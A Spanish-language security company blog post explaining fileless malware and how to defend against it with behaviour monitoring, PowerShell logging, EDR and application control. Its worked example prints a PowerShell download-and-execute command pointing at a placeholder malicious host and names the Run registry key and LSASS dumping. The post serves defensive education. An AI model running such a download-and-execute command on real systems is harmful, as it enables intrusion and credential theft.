Vulnerabilidades

Fileless attacks

Qué son y cómo protegerse de la amenaza invisible que evade los antivirus tradicionales.

  • 27 febrero, 2026
  • 4 minutos de lectura

En un entorno donde los ciberdelincuentes evolucionan constantemente, los ataques fileless o malware sin archivos se han convertido en una de las amenazas más sofisticadas y difíciles de detectar para empresas y equipos de seguridad.

A diferencia del malware tradicional, estos ataques no depositan ejecutables maliciosos en el disco, lo que hace que evadan gran parte de las defensas clásicas basadas en firmas y análisis de archivos.

¿Qué son los ataques fileless?

Los ataques fileless (sin archivos) son un tipo de amenaza que no deja archivos maliciosos en disco y se ejecuta directamente en la memoria del sistema (RAM) o usando herramientas legítimas del sistema operativo, como PowerShell o Windows Management Instrumentation (WMI).

Al aprovechar procesos confiables del sistema, estos ataques evaden gran parte de los mecanismos tradicionales de detección de malware.

¿Cómo funcionan estos ataques?

Ejecución en memoria

El código malicioso se carga directamente en la memoria RAM y se ejecuta desde allí, sin escribir nada en disco.

Herramientas legítimas

Uso de PowerShell, WMI, mshta, regsvr32 o rundll32 para ejecutar comandos maliciosos.

Persistencia

Modificación del registro o tareas programadas para sobrevivir reinicios sin archivos obvios.

Living off the land

Los atacantes usan las mismas herramientas que los administradores legítimos.

Análisis detallado de fallas de seguridad transversales

Las defensas que solo dependen de escanear archivos en disco ya no son suficientes ante esta amenaza invisible.

No depositan archivos en disco, evadiendo firmas tradicionales.

Ejecutan código dentro de procesos confiables.

Dejan pocos o ningún rastro forense.

Requieren monitoreo de comportamiento, no de archivos.

Tipos de actividades maliciosas

Robo de credenciales

Mediante técnicas de extracción de memoria (por ejemplo, LSASS).

Ransomware en memoria

Sin archivos en disco, cifran datos o minan criptomonedas (Cryptojacking).

Puertas traseras persistentes

Mediante la manipulación de WMI o del registro del sistema.

Ataques complejos combinados

Uso de shellcode o exploits que inyectan código directamente a la memoria.

Ejemplo técnico: ataque fileless usando PowerShell

1. Vector de entrada
Un atacante envía un correo de phishing con un documento de Word que contiene una macro maliciosa. El usuario habilita las macros, iniciando la cadena de infección.

2. Ejecución del payload
La macro ejecuta un comando de PowerShell ofuscado que descarga y ejecuta código directamente en memoria:

powershell -NoProfile -ExecutionPolicy Bypass -Command “IEX (New-Object Net.WebClient).DownloadStr ing (‘http://malicious-site.com/payload.ps1’)”

3. Comportamiento en memoria

  • No se guarda en disco.
  • Se ejecuta directamente en RAM.
  • Utiliza funciones nativas como Invoke-Expression (IEX).

Impacto y Persistencia

  • Persistencia sin archivos
    Modifica el registro para ejecutarse al inicio sin dejar un ejecutable:
    HKCU\Software\ Microsoft\Windows\ CurrentVersion \Run
  • Robo de credenciales
    Accede a la memoria del proceso LSASS.exe para extraer contraseñas en texto plano o hashes NTLM.
  • Comando y control (C2)
    Abre un canal cifrado reverso hacia el servidor del atacante para recibir nuevas instrucciones o exfiltrar datos.

¿Cómo protegerse?

Monitoreo de comportamiento en tiempo real

Los sistemas deben analizar eventos y comportamientos (no solo archivos), como ejecuciones inusuales de PowerShell o WMI.

Habilitar registros y telemetría avanzada

Activar registros detallados en PowerShell (script block logging, transcription) y en otras herramientas para capturar actividades sospechosas en memoria.

Implementar EDR / XDR

Las soluciones de Endpoint Detection and Response (EDR) detectan anomalías y relaciones entre procesos que pueden indicar ataques fileless.

Restringir herramientas de administración

Usar políticas como AppLocker, WDAC o control de aplicaciones para limitar cómo se ejecutan scripts y procesos administrativos.

Actualizar sistemas y parchear

Muchos ataques fileless requieren explotar vulnerabilidades conocidas para ejecutar comandos en memoria. Mantener sistemas al día reduce este riesgo.

La clave para protegerse es un enfoque centrado en el análisis de comportamiento, visibilidad profunda de procesos y herramientas EDR/XDR que puedan identificar actividad sospechosa en memoria en tiempo real.

Solicita una auditoría de seguridad

Suscríbete a nuestro newsletter

Sé el primero en recibir noticias, alertas y contenido clave sobre ciberseguridad. Descubre cómo en Scube ayudamos a las empresas a proteger sus activos digitales.

Somos una empresa de ciberseguridad que ofrece soluciones para proteger, optimizar y hacer crecer tu empresa.

Enlaces rápidos

Contacto

Teléfono

(+502) 2302-2239

Email

ventas@scube.com.gt

Dirección

6a. calle 5-28 zona 9, edificio Torre Cristal, nivel 1, oficina 103.
Copyright Scube, S.A. © 2025 Todos los derechos reservados